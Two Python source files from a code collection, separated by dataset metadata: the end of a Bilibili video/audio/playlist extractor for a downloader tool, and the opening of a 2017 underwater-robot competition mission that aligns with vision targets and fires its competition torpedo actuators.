return 'https://api.bilibili.com/x/space/channel/video?mid=%s&cid=%s&pn=%s&ps=%s&order=0&jsonp=jsonp' % (mid, cid, pn, ps)
@staticmethod
def bilibili_space_favlist_api(fid, pn=1, ps=20):
return 'https://api.bilibili.com/x/v3/fav/resource/list?media_id=%s&pn=%s&ps=%s&order=mtime&type=0&tid=0&jsonp=jsonp' % (fid, pn, ps)
@staticmethod
def bilibili_space_video_api(mid, pn=1, ps=100):
return 'https://space.bilibili.com/ajax/member/getSubmitVideos?mid=%s&page=%s&pagesize=%s&order=0&jsonp=jsonp' % (mid, pn, ps)
@staticmethod
def bilibili_vc_api(video_id):
return 'https://api.vc.bilibili.com/clip/v1/video/detail?video_id=%s' % video_id
@staticmethod
def bilibili_h_api(doc_id):
return 'https://api.vc.bilibili.com/link_draw/v1/doc/detail?doc_id=%s' % doc_id
@staticmethod
def url_size(url, faker=False, headers={},err_value=0):
try:
return url_size(url,faker,headers)
except:
return err_value
def prepare(self, **kwargs):
self.stream_qualities = {s['quality']: s for s in self.stream_types}
try:
html_content = get_content(self.url, headers=self.bilibili_headers(referer=self.url))
except:
html_content = '' # live always returns 400 (why?)
#self.title = match1(html_content,
# r'<h1 title="([^"]+)"')
# redirect: watchlater
if re.match(r'https?://(www\.)?bilibili\.com/watchlater/#/(av(\d+)|BV(\S+)/?)', self.url):
avid = match1(self.url, r'/(av\d+)') or match1(self.url, r'/(BV\w+)')
p = int(match1(self.url, r'/p(\d+)') or '1')
self.url = 'https://www.bilibili.com/video/%s?p=%s' % (avid, p)
html_content = get_content(self.url, headers=self.bilibili_headers())
# redirect: bangumi/play/ss -> bangumi/play/ep
# redirect: bangumi.bilibili.com/anime -> bangumi/play/ep
elif re.match(r'https?://(www\.)?bilibili\.com/bangumi/play/ss(\d+)', self.url) or \
re.match(r'https?://bangumi\.bilibili\.com/anime/(\d+)/play', self.url):
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
ep_id = initial_state['epList'][0]['id']
self.url = 'https://www.bilibili.com/bangumi/play/ep%s' % ep_id
html_content = get_content(self.url, headers=self.bilibili_headers(referer=self.url))
# sort it out
if re.match(r'https?://(www\.)?bilibili\.com/audio/au(\d+)', self.url):
sort = 'audio'
elif re.match(r'https?://(www\.)?bilibili\.com/bangumi/play/ep(\d+)', self.url):
sort = 'bangumi'
elif match1(html_content, r'<meta property="og:url" content="(https://www.bilibili.com/bangumi/play/[^"]+)"'):
sort = 'bangumi'
elif re.match(r'https?://live\.bilibili\.com/', self.url):
sort = 'live'
elif re.match(r'https?://vc\.bilibili\.com/video/(\d+)', self.url):
sort = 'vc'
elif re.match(r'https?://(www\.)?bilibili\.com/video/(av(\d+)|(BV(\S+)))', self.url):
sort = 'video'
elif re.match(r'https?://h\.?bilibili\.com/(\d+)', self.url):
sort = 'h'
else:
self.download_playlist_by_url(self.url, **kwargs)
return
# regular av video
if sort == 'video':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
playinfo_text = match1(html_content, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo = json.loads(playinfo_text) if playinfo_text else None
html_content_ = get_content(self.url, headers=self.bilibili_headers(cookie='CURRENT_FNVAL=16'))
playinfo_text_ = match1(html_content_, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo_ = json.loads(playinfo_text_) if playinfo_text_ else None
# warn if it is a multi-part video
pn = initial_state['videoData']['videos']
if pn > 1 and not kwargs.get('playlist'):
log.w('This is a multipart video. (use --playlist to download all parts.)')
# set video title
self.title = initial_state['videoData']['title']
# refine title for a specific part, if it is a multi-part video
p = int(match1(self.url, r'[\?&]p=(\d+)') or match1(self.url, r'/index_(\d+)') or
'1') # use URL to decide p-number, not initial_state['p']
if pn > 1:
part = initial_state['videoData']['pages'][p - 1]['part']
self.title = '%s (P%s. %s)' % (self.title, p, part)
# construct playinfos
avid = initial_state['aid']
cid = initial_state['videoData']['pages'][p - 1]['cid'] # use p-number, not initial_state['videoData']['cid']
current_quality, best_quality = None, None
if playinfo is not None:
current_quality = playinfo['data']['quality'] or None # 0 indicates an error, fallback to None
if 'accept_quality' in playinfo['data'] and playinfo['data']['accept_quality'] != []:
best_quality = playinfo['data']['accept_quality'][0]
playinfos = []
if playinfo is not None:
playinfos.append(playinfo)
if playinfo_ is not None:
playinfos.append(playinfo_)
# get alternative formats from API
for qn in [120, 112, 80, 64, 32, 16]:
# automatic format for durl: qn=0
# for dash, qn does not matter
if current_quality is None or qn < current_quality:
api_url = self.bilibili_api(avid, cid, qn=qn)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
api_playinfo = json.loads(api_content)
if api_playinfo['code'] == 0: # success
playinfos.append(api_playinfo)
else:
message = api_playinfo['data']['message']
if best_quality is None or qn <= best_quality:
api_url = self.bilibili_interface_api(cid, qn=qn)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
api_playinfo_data = json.loads(api_content)
if api_playinfo_data.get('quality'):
playinfos.append({'code': 0, 'message': '0', 'ttl': 1, 'data': api_playinfo_data})
if not playinfos:
log.w(message)
# use bilibili error video instead
url = 'https://static.hdslb.com/error.mp4'
_, container, size = url_info(url)
self.streams['flv480'] = {'container': container, 'size': size, 'src': [url]}
return
for playinfo in playinfos:
quality = playinfo['data']['quality']
format_id = self.stream_qualities[quality]['id']
container = self.stream_qualities[quality]['container'].lower()
desc = self.stream_qualities[quality]['desc']
if 'durl' in playinfo['data']:
src, size = [], 0
for durl in playinfo['data']['durl']:
src.append(durl['url'])
size += durl['size']
self.streams[format_id] = {'container': container, 'quality': desc, 'size': size, 'src': src}
# DASH formats
if 'dash' in playinfo['data']:
audio_size_cache = {}
for video in playinfo['data']['dash']['video']:
# prefer the latter codecs!
s = self.stream_qualities[video['id']]
format_id = 'dash-' + s['id'] # prefix
container = 'mp4' # enforce MP4 container
desc = s['desc']
audio_quality = s['audio_quality']
baseurl = video['baseUrl']
size = self.url_size(baseurl, headers=self.bilibili_headers(referer=self.url))
# find matching audio track
if playinfo['data']['dash']['audio']:
audio_baseurl = playinfo['data']['dash']['audio'][0]['baseUrl']
for audio in playinfo['data']['dash']['audio']:
if int(audio['id']) == audio_quality:
audio_baseurl = audio['baseUrl']
break
if not audio_size_cache.get(audio_quality, False):
audio_size_cache[audio_quality] = self.url_size(audio_baseurl, headers=self.bilibili_headers(referer=self.url))
size += audio_size_cache[audio_quality]
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl], [audio_baseurl]], 'size': size}
else:
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl]], 'size': size}
# get danmaku
self.danmaku = get_content('http://comment.bilibili.com/%s.xml' % cid)
# bangumi
elif sort == 'bangumi':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
# warn if this bangumi has more than 1 video
epn = len(initial_state['epList'])
if epn > 1 and not kwargs.get('playlist'):
log.w('This bangumi currently has %s videos. (use --playlist to download all videos.)' % epn)
# set video title
self.title = initial_state['h1Title']
# construct playinfos
ep_id = initial_state['epInfo']['id']
avid = initial_state['epInfo']['aid']
cid = initial_state['epInfo']['cid']
playinfos = []
api_url = self.bilibili_bangumi_api(avid, cid, ep_id)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
api_playinfo = json.loads(api_content)
if api_playinfo['code'] == 0: # success
playinfos.append(api_playinfo)
else:
log.e(api_playinfo['message'])
return
current_quality = api_playinfo['result']['quality']
# get alternative formats from API
for fnval in [8, 16]:
for qn in [120, 112, 80, 64, 32, 16]:
# automatic format for durl: qn=0
# for dash, qn does not matter
if qn != current_quality:
api_url = self.bilibili_bangumi_api(avid, cid, ep_id, qn=qn, fnval=fnval)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
api_playinfo = json.loads(api_content)
if api_playinfo['code'] == 0: # success
playinfos.append(api_playinfo)
for playinfo in playinfos:
if 'durl' in playinfo['result']:
quality = playinfo['result']['quality']
format_id = self.stream_qualities[quality]['id']
container = self.stream_qualities[quality]['container'].lower()
desc = self.stream_qualities[quality]['desc']
src, size = [], 0
for durl in playinfo['result']['durl']:
src.append(durl['url'])
size += durl['size']
self.streams[format_id] = {'container': container, 'quality': desc, 'size': size, 'src': src}
# DASH formats
if 'dash' in playinfo['result']:
for video in playinfo['result']['dash']['video']:
# playinfo['result']['quality'] does not reflect the correct quality of DASH stream
quality = self.height_to_quality(video['height'], video['id']) # convert height to quality code
s = self.stream_qualities[quality]
format_id = 'dash-' + s['id'] # prefix
container = 'mp4' # enforce MP4 container
desc = s['desc']
audio_quality = s['audio_quality']
baseurl = video['baseUrl']
size = url_size(baseurl, headers=self.bilibili_headers(referer=self.url))
# find matching audio track
audio_baseurl = playinfo['result']['dash']['audio'][0]['baseUrl']
for audio in playinfo['result']['dash']['audio']:
if int(audio['id']) == audio_quality:
audio_baseurl = audio['baseUrl']
break
size += url_size(audio_baseurl, headers=self.bilibili_headers(referer=self.url))
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl], [audio_baseurl]], 'size': size}
# get danmaku
self.danmaku = get_content('http://comment.bilibili.com/%s.xml' % cid)
# vc video
elif sort == 'vc':
video_id = match1(self.url, r'https?://vc\.?bilibili\.com/video/(\d+)')
api_url = self.bilibili_vc_api(video_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
api_playinfo = json.loads(api_content)
# set video title
self.title = '%s (%s)' % (api_playinfo['data']['user']['name'], api_playinfo['data']['item']['id'])
height = api_playinfo['data']['item']['height']
quality = self.height_to_quality(height) # convert height to quality code
s = self.stream_qualities[quality]
format_id = s['id']
container = 'mp4' # enforce MP4 container
desc = s['desc']
playurl = api_playinfo['data']['item']['video_playurl']
size = int(api_playinfo['data']['item']['video_size'])
self.streams[format_id] = {'container': container, 'quality': desc, 'size': size, 'src': [playurl]}
# live
elif sort == 'live':
m = re.match(r'https?://live\.bilibili\.com/(\w+)', self.url)
short_id = m.group(1)
api_url = self.bilibili_live_room_init_api(short_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
room_init_info = json.loads(api_content)
room_id = room_init_info['data']['room_id']
api_url = self.bilibili_live_room_info_api(room_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
room_info = json.loads(api_content)
# set video title
self.title = room_info['data']['title'] + '.' + str(int(time.time()))
api_url = self.bilibili_live_api(room_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
video_info = json.loads(api_content)
durls = video_info['data']['durl']
playurl = durls[0]['url']
container = 'flv' # enforce FLV container
self.streams['flv'] = {'container': container, 'quality': 'unknown',
'size': 0, 'src': [playurl]}
# audio
elif sort == 'audio':
m = re.match(r'https?://(?:www\.)?bilibili\.com/audio/au(\d+)', self.url)
sid = m.group(1)
api_url = self.bilibili_audio_info_api(sid)
api_content = get_content(api_url, headers=self.bilibili_headers())
song_info = json.loads(api_content)
# set audio title
self.title = song_info['data']['title']
# get lyrics
self.lyrics = get_content(song_info['data']['lyric'])
api_url = self.bilibili_audio_api(sid)
api_content = get_content(api_url, headers=self.bilibili_headers())
audio_info = json.loads(api_content)
playurl = audio_info['data']['cdns'][0]
size = audio_info['data']['size']
container = 'mp4' # enforce MP4 container
self.streams['mp4'] = {'container': container,
'size': size, 'src': [playurl]}
# h images
elif sort == 'h':
m = re.match(r'https?://h\.?bilibili\.com/(\d+)', self.url)
doc_id = m.group(1)
api_url = self.bilibili_h_api(doc_id)
api_content = get_content(api_url, headers=self.bilibili_headers())
h_info = json.loads(api_content)
urls = []
for pic in h_info['data']['item']['pictures']:
img_src = pic['img_src']
urls.append(img_src)
size = urls_size(urls)
self.title = doc_id
container = 'jpg' # enforce JPG container
self.streams[container] = {'container': container,
'size': size, 'src': urls}
def prepare_by_cid(self,avid,cid,title,html_content,playinfo,playinfo_,url):
#response for interaction video
#主要针对互动视频,使用cid而不是url来相互区分
self.stream_qualities = {s['quality']: s for s in self.stream_types}
self.title = title
self.url = url
current_quality, best_quality = None, None
if playinfo is not None:
current_quality = playinfo['data']['quality'] or None # 0 indicates an error, fallback to None
if 'accept_quality' in playinfo['data'] and playinfo['data']['accept_quality'] != []:
best_quality = playinfo['data']['accept_quality'][0]
playinfos = []
if playinfo is not None:
playinfos.append(playinfo)
if playinfo_ is not None:
playinfos.append(playinfo_)
# get alternative formats from API
for qn in [80, 64, 32, 16]:
# automatic format for durl: qn=0
# for dash, qn does not matter
if current_quality is None or qn < current_quality:
api_url = self.bilibili_api(avid, cid, qn=qn)
api_content = get_content(api_url, headers=self.bilibili_headers())
api_playinfo = json.loads(api_content)
if api_playinfo['code'] == 0: # success
playinfos.append(api_playinfo)
else:
message = api_playinfo['data']['message']
if best_quality is None or qn <= best_quality:
api_url = self.bilibili_interface_api(cid, qn=qn)
api_content = get_content(api_url, headers=self.bilibili_headers())
api_playinfo_data = json.loads(api_content)
if api_playinfo_data.get('quality'):
playinfos.append({'code': 0, 'message': '0', 'ttl': 1, 'data': api_playinfo_data})
if not playinfos:
log.w(message)
# use bilibili error video instead
url = 'https://static.hdslb.com/error.mp4'
_, container, size = url_info(url)
self.streams['flv480'] = {'container': container, 'size': size, 'src': [url]}
return
for playinfo in playinfos:
quality = playinfo['data']['quality']
format_id = self.stream_qualities[quality]['id']
container = self.stream_qualities[quality]['container'].lower()
desc = self.stream_qualities[quality]['desc']
if 'durl' in playinfo['data']:
src, size = [], 0
for durl in playinfo['data']['durl']:
src.append(durl['url'])
size += durl['size']
self.streams[format_id] = {'container': container, 'quality': desc, 'size': size, 'src': src}
# DASH formats
if 'dash' in playinfo['data']:
audio_size_cache = {}
for video in playinfo['data']['dash']['video']:
# prefer the latter codecs!
s = self.stream_qualities[video['id']]
format_id = 'dash-' + s['id'] # prefix
container = 'mp4' # enforce MP4 container
desc = s['desc']
audio_quality = s['audio_quality']
baseurl = video['baseUrl']
size = self.url_size(baseurl, headers=self.bilibili_headers(referer=self.url))
# find matching audio track
if playinfo['data']['dash']['audio']:
audio_baseurl = playinfo['data']['dash']['audio'][0]['baseUrl']
for audio in playinfo['data']['dash']['audio']:
if int(audio['id']) == audio_quality:
audio_baseurl = audio['baseUrl']
break
if not audio_size_cache.get(audio_quality, False):
audio_size_cache[audio_quality] = self.url_size(audio_baseurl,
headers=self.bilibili_headers(referer=self.url))
size += audio_size_cache[audio_quality]
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl], [audio_baseurl]], 'size': size}
else:
self.dash_streams[format_id] = {'container': container, 'quality': desc,
'src': [[baseurl]], 'size': size}
# get danmaku
self.danmaku = get_content('http://comment.bilibili.com/%s.xml' % cid)
def extract(self, **kwargs):
# set UA and referer for downloading
headers = self.bilibili_headers(referer=self.url)
self.ua, self.referer = headers['User-Agent'], headers['Referer']
if not self.streams_sorted:
# no stream is available
return
if 'stream_id' in kwargs and kwargs['stream_id']:
# extract the stream
stream_id = kwargs['stream_id']
if stream_id not in self.streams and stream_id not in self.dash_streams:
log.e('[Error] Invalid video format.')
log.e('Run \'-i\' command with no specific video format to view all available formats.')
exit(2)
else:
# extract stream with the best quality
stream_id = self.streams_sorted[0]['id']
def download_playlist_by_url(self, url, **kwargs):
self.url = url
kwargs['playlist'] = True
html_content = get_content(self.url, headers=self.bilibili_headers(referer=self.url))
# sort it out
if re.match(r'https?://(www\.)?bilibili\.com/bangumi/play/ep(\d+)', self.url):
sort = 'bangumi'
elif match1(html_content, r'<meta property="og:url" content="(https://www.bilibili.com/bangumi/play/[^"]+)"'):
sort = 'bangumi'
elif re.match(r'https?://(www\.)?bilibili\.com/bangumi/media/md(\d+)', self.url) or \
re.match(r'https?://bangumi\.bilibili\.com/anime/(\d+)', self.url):
sort = 'bangumi_md'
elif re.match(r'https?://(www\.)?bilibili\.com/video/(av(\d+)|BV(\S+))', self.url):
sort = 'video'
elif re.match(r'https?://space\.?bilibili\.com/(\d+)/channel/detail\?.*cid=(\d+)', self.url):
sort = 'space_channel'
elif re.match(r'https?://space\.?bilibili\.com/(\d+)/favlist\?.*fid=(\d+)', self.url):
sort = 'space_favlist'
elif re.match(r'https?://space\.?bilibili\.com/(\d+)/video', self.url):
sort = 'space_video'
elif re.match(r'https?://(www\.)?bilibili\.com/audio/am(\d+)', self.url):
sort = 'audio_menu'
else:
log.e('[Error] Unsupported URL pattern.')
exit(1)
# regular av video
if sort == 'video':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
aid = initial_state['videoData']['aid']
pn = initial_state['videoData']['videos']
if pn!= len(initial_state['videoData']['pages']):#interaction video 互动视频
search_node_list = []
download_cid_set = set([initial_state['videoData']['cid']])
params = {
'id': 'cid:{}'.format(initial_state['videoData']['cid']),
'aid': str(aid)
}
urlcontent = get_content('https://api.bilibili.com/x/player.so?'+parse.urlencode(params), headers=self.bilibili_headers(referer='https://www.bilibili.com/video/av{}'.format(aid)))
graph_version = json.loads(urlcontent[urlcontent.find('<interaction>')+13:urlcontent.find('</interaction>')])['graph_version']
params = {
'aid': str(aid),
'graph_version': graph_version,
'platform': 'pc',
'portal': 0,
'screen': 0,
}
node_info = json.loads(get_content('https://api.bilibili.com/x/stein/nodeinfo?'+parse.urlencode(params)))
playinfo_text = match1(html_content, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo = json.loads(playinfo_text) if playinfo_text else None
html_content_ = get_content(self.url, headers=self.bilibili_headers(cookie='CURRENT_FNVAL=16'))
playinfo_text_ = match1(html_content_, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo_ = json.loads(playinfo_text_) if playinfo_text_ else None
self.prepare_by_cid(aid, initial_state['videoData']['cid'], initial_state['videoData']['title'] + ('P{}. {}'.format(1, node_info['data']['title'])),html_content,playinfo,playinfo_,url)
self.extract(**kwargs)
self.download(**kwargs)
for choice in node_info['data']['edges']['choices']:
search_node_list.append(choice['node_id'])
if not choice['cid'] in download_cid_set:
download_cid_set.add(choice['cid'])
self.prepare_by_cid(aid,choice['cid'],initial_state['videoData']['title']+('P{}. {}'.format(len(download_cid_set),choice['option'])),html_content,playinfo,playinfo_,url)
self.extract(**kwargs)
self.download(**kwargs)
while len(search_node_list)>0:
node_id = search_node_list.pop(0)
params.update({'node_id':node_id})
node_info = json.loads(get_content('https://api.bilibili.com/x/stein/nodeinfo?'+parse.urlencode(params)))
if node_info['data'].__contains__('edges'):
for choice in node_info['data']['edges']['choices']:
search_node_list.append(choice['node_id'])
if not choice['cid'] in download_cid_set:
download_cid_set.add(choice['cid'])
self.prepare_by_cid(aid,choice['cid'],initial_state['videoData']['title']+('P{}. {}'.format(len(download_cid_set),choice['option'])),html_content,playinfo,playinfo_,url)
try:
self.streams_sorted = [dict([('id', stream_type['id'])] + list(self.streams[stream_type['id']].items())) for stream_type in self.__class__.stream_types if stream_type['id'] in self.streams]
except:
self.streams_sorted = [dict([('itag', stream_type['itag'])] + list(self.streams[stream_type['itag']].items())) for stream_type in self.__class__.stream_types if stream_type['itag'] in self.streams]
self.extract(**kwargs)
self.download(**kwargs)
else:
playinfo_text = match1(html_content, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo = json.loads(playinfo_text) if playinfo_text else None
html_content_ = get_content(self.url, headers=self.bilibili_headers(cookie='CURRENT_FNVAL=16'))
playinfo_text_ = match1(html_content_, r'__playinfo__=(.*?)</script><script>') # FIXME
playinfo_ = json.loads(playinfo_text_) if playinfo_text_ else None
p = int(match1(self.url, r'[\?&]p=(\d+)') or match1(self.url, r'/index_(\d+)') or '1')-1
for pi in range(p,pn):
self.prepare_by_cid(aid,initial_state['videoData']['pages'][pi]['cid'],'%s (P%s. %s)' % (initial_state['videoData']['title'], pi+1, initial_state['videoData']['pages'][pi]['part']),html_content,playinfo,playinfo_,url)
try:
self.streams_sorted = [dict([('id', stream_type['id'])] + list(self.streams[stream_type['id']].items())) for stream_type in self.__class__.stream_types if stream_type['id'] in self.streams]
except:
self.streams_sorted = [dict([('itag', stream_type['itag'])] + list(self.streams[stream_type['itag']].items())) for stream_type in self.__class__.stream_types if stream_type['itag'] in self.streams]
self.extract(**kwargs)
self.download(**kwargs)
# purl = 'https://www.bilibili.com/video/av%s?p=%s' % (aid, pi+1)
# self.__class__().download_by_url(purl, **kwargs)
elif sort == 'bangumi':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
epn, i = len(initial_state['epList']), 0
for ep in initial_state['epList']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
ep_id = ep['id']
epurl = 'https://www.bilibili.com/bangumi/play/ep%s/' % ep_id
self.__class__().download_by_url(epurl, **kwargs)
elif sort == 'bangumi_md':
initial_state_text = match1(html_content, r'__INITIAL_STATE__=(.*?);\(function\(\)') # FIXME
initial_state = json.loads(initial_state_text)
epn, i = len(initial_state['mediaInfo']['episodes']), 0
for ep in initial_state['mediaInfo']['episodes']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
ep_id = ep['ep_id']
epurl = 'https://www.bilibili.com/bangumi/play/ep%s/' % ep_id
self.__class__().download_by_url(epurl, **kwargs)
elif sort == 'space_channel':
m = re.match(r'https?://space\.?bilibili\.com/(\d+)/channel/detail\?.*cid=(\d+)', self.url)
mid, cid = m.group(1), m.group(2)
api_url = self.bilibili_space_channel_api(mid, cid)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
channel_info = json.loads(api_content)
# TBD: channel of more than 100 videos
epn, i = len(channel_info['data']['list']['archives']), 0
for video in channel_info['data']['list']['archives']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
url = 'https://www.bilibili.com/video/av%s' % video['aid']
self.__class__().download_playlist_by_url(url, **kwargs)
elif sort == 'space_favlist':
m = re.match(r'https?://space\.?bilibili\.com/(\d+)/favlist\?.*fid=(\d+)', self.url)
vmid, fid = m.group(1), m.group(2)
api_url = self.bilibili_space_favlist_api(fid)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
favlist_info = json.loads(api_content)
pc = favlist_info['data']['info']['media_count'] // len(favlist_info['data']['medias'])
if favlist_info['data']['info']['media_count'] % len(favlist_info['data']['medias']) != 0:
pc += 1
for pn in range(1, pc + 1):
log.w('Extracting %s of %s pages ...' % (pn, pc))
api_url = self.bilibili_space_favlist_api(fid, pn=pn)
api_content = get_content(api_url, headers=self.bilibili_headers(referer=self.url))
favlist_info = json.loads(api_content)
epn, i = len(favlist_info['data']['medias']), 0
for video in favlist_info['data']['medias']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
url = 'https://www.bilibili.com/video/av%s' % video['id']
self.__class__().download_playlist_by_url(url, **kwargs)
elif sort == 'space_video':
m = re.match(r'https?://space\.?bilibili\.com/(\d+)/video', self.url)
mid = m.group(1)
api_url = self.bilibili_space_video_api(mid)
api_content = get_content(api_url, headers=self.bilibili_headers())
videos_info = json.loads(api_content)
pc = videos_info['data']['pages']
for pn in range(1, pc + 1):
api_url = self.bilibili_space_video_api(mid, pn=pn)
api_content = get_content(api_url, headers=self.bilibili_headers())
videos_info = json.loads(api_content)
epn, i = len(videos_info['data']['vlist']), 0
for video in videos_info['data']['vlist']:
i += 1; log.w('Extracting %s of %s videos ...' % (i, epn))
url = 'https://www.bilibili.com/video/av%s' % video['aid']
self.__class__().download_playlist_by_url(url, **kwargs)
elif sort == 'audio_menu':
m = re.match(r'https?://(?:www\.)?bilibili\.com/audio/am(\d+)', self.url)
sid = m.group(1)
#api_url = self.bilibili_audio_menu_info_api(sid)
#api_content = get_content(api_url, headers=self.bilibili_headers())
#menu_info = json.loads(api_content)
api_url = self.bilibili_audio_menu_song_api(sid)
api_content = get_content(api_url, headers=self.bilibili_headers())
menusong_info = json.loads(api_content)
epn, i = len(menusong_info['data']['data']), 0
for song in menusong_info['data']['data']:
i += 1; log.w('Extracting %s of %s songs ...' % (i, epn))
url = 'https://www.bilibili.com/audio/au%s' % song['id']
self.__class__().download_by_url(url, **kwargs)
site = Bilibili()
download = site.download_by_url
download_playlist = site.download_playlist_by_url
bilibili_download = download
| 52.599222
| 237
| 0.54658
|
c4eb360e23f4bb43e91824560fef84d985d7cea2
| 12,473
|
py
|
Python
|
mission/missions/old/2017/torpedoes.py
|
cuauv/software
|
5ad4d52d603f81a7f254f365d9b0fe636d03a260
|
[
"BSD-3-Clause"
] | 70
|
2015-11-16T18:04:01.000Z
|
2022-03-05T09:04:02.000Z
|
mission/missions/old/2017/torpedoes.py
|
cuauv/software
|
5ad4d52d603f81a7f254f365d9b0fe636d03a260
|
[
"BSD-3-Clause"
] | 1
|
2016-08-03T05:13:19.000Z
|
2016-08-03T06:19:39.000Z
|
mission/missions/old/2017/torpedoes.py
|
cuauv/software
|
5ad4d52d603f81a7f254f365d9b0fe636d03a260
|
[
"BSD-3-Clause"
] | 34
|
2015-12-15T17:29:23.000Z
|
2021-11-18T14:15:12.000Z
|
from collections import namedtuple
import copy
import shm
from shm.watchers import watcher
from mission.framework.task import Task
from mission.framework.targeting import PIDLoop, ForwardTarget
from mission.framework.combinators import (
Sequential,
Concurrent,
MasterConcurrent,
Retry,
Conditional,
Defer,
)
from mission.framework.timing import Timeout
from mission.framework.movement import (
RelativeToInitialDepth,
RelativeToCurrentDepth,
VelocityX,
VelocityY,
Depth,
)
from mission.framework.primitive import (
Zero,
Log,
Succeed,
Fail,
FunctionTask,
NoOp,
)
from mission.framework.actuators import FireActuator
from mission.framework.position import (
GoToPositionRough,
MoveX,
MoveY,
MoveXRough,
WithPositionalControl,
NavigationSpeed,
)
from mission.framework.track import ConsistentObject
from mission.framework.helpers import call_if_function
from mission.missions.ozer_common import (
ConsistentTask,
Except,
GlobalTimeoutError,
StillHeadingSearch,
GradualHeading,
PrintDone,
Infinite,
)
from mission.constants.config import torpedoes as constants
"""
Torpedoes 2017!
"""
class Vision(Task):
# Board/cutout IDs are indices
TENT_ID = 0
SQUID_ID = 1
def __init__(self, *args, **kwargs):
super().__init__()
# Vision object needs to be ready for rest of mission to access, so must
# initialize before on_first_run()
self.trackers = [ConsistentObject() for i in range(2)]
self.watcher = watcher()
self.watcher.watch(shm.torpedoes_vision)
self.pull()
def pull(self):
shm_boards = [shm.torpedoes_tentacle.get(), shm.torpedoes_squid.get()]
def noneify(g): return g if g.visible else None
self.boards = [t.map(noneify(b)) for t, b in zip(self.trackers, shm_boards)]
def on_run(self, *args, **kwargs):
if self.watcher.has_changed():
self.pull()
# Forecam offsets may be incorrect to compensate for inaccurate DVL-less control
class Torp:
FIRE_TIME = 0.5
def __init__(self, forecam_offset, actuator):
self.forecam_offset = forecam_offset
self.actuator = actuator
def AlignFromForecam(self):
return ConsistentTask(Concurrent(
RelativeToInitialDepth(-self.forecam_offset[1]),
MoveY(-self.forecam_offset[0], deadband=0.025),
finite=False,
), success=2, total=3)
def Fire(self):
return Sequential(
Log('Firing {} (!!)'.format(self.actuator)),
FireActuator(self.actuator, self.FIRE_TIME),
)
TORPS = [Torp((-0.02, -0.12), 'left_torpedo'), Torp((0.15, -0.12), 'right_torpedo')]
Cutout = namedtuple('Cutout', ['name', 'board_func', 'coord_func', 'is_noodle'])
class Torpedoes(Task):
def on_first_run(self, vision, *args, **kwargs):
def small_cutout_coord(board):
return (board.small_cutout_x, board.small_cutout_y)
def large_cutout_coord(board):
return (board.large_cutout_x, board.large_cutout_y)
small_tent_cutout = Cutout(
'small tentacle',
lambda: vision.boards[vision.TENT_ID],
lambda: small_cutout_coord(vision.boards[vision.TENT_ID]),
False,
)
# large_tent_cutout = Cutout(
# 'large tentacle',
# lambda: vision.boards[vision.TENT_ID],
# lambda: large_cutout_coord(vision.boards[vision.TENT_ID]),
# False,
# )
small_squid_cutout = Cutout(
'small squid',
lambda: vision.boards[vision.SQUID_ID],
lambda: small_cutout_coord(vision.boards[vision.SQUID_ID]),
True,
)
# large_squid_cutout = Cutout(
# 'large squid',
# lambda: vision.boards[vision.SQUID_ID],
# lambda: large_cutout_coord(vision.boards[vision.SQUID_ID]),
# False,
# )
self.use_task(Except(
Sequential(
Log('Starting torpedoes!'),
Succeed(TryCompleteCutout(vision, small_tent_cutout, TORPS[0])),
Succeed(TryCompleteCutout(vision, small_squid_cutout, TORPS[1])),
),
Fail(Log('Global timeout, aborting torpedoes')),
GlobalTimeoutError,
)),
class TryCompleteCutout(Task):
def on_first_run(self, vision, cutout, torp, *args, **kwargs):
self.use_task(Conditional(
Sequential(
Log('Starting to attempt {} cutout'.format(cutout.name)),
Retry(lambda: CompleteCutout(vision, cutout, torp), 3),
),
on_fail=Fail(Sequential(
Log('Failed to ever complete {} cutout, firing torpedo anyway'.format(cutout.name)),
torp.Fire(),
)),
))
class CompleteCutout(Task):
MOVE_BOARD_TIMEOUT = 30
ALIGN_CUTOUT_TIMEOUT = 60
def on_first_run(self, vision, cutout, torp, *args, **kwargs):
self.use_task(Sequential(
Log('Attempting {} cutout'.format(cutout.name)),
Conditional(
Retry(lambda: Timeout(
MoveInFrontOfBoards(vision),
self.MOVE_BOARD_TIMEOUT,
), 3),
on_fail=Fail(Log('Failed to ever move in front of boards')),
),
RestorePos(WithPositionalControl(Sequential(
Timeout(AlignCutout(cutout, torp), self.ALIGN_CUTOUT_TIMEOUT),
torp.Fire(),
))),
))
class MoveInFrontOfBoards(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Sequential(
Log('Moving to torpedoes depth'),
Depth(constants.depth),
Log('Searching for boards'),
MasterConcurrent(IdentifyBoard(vision), StillHeadingSearch()),
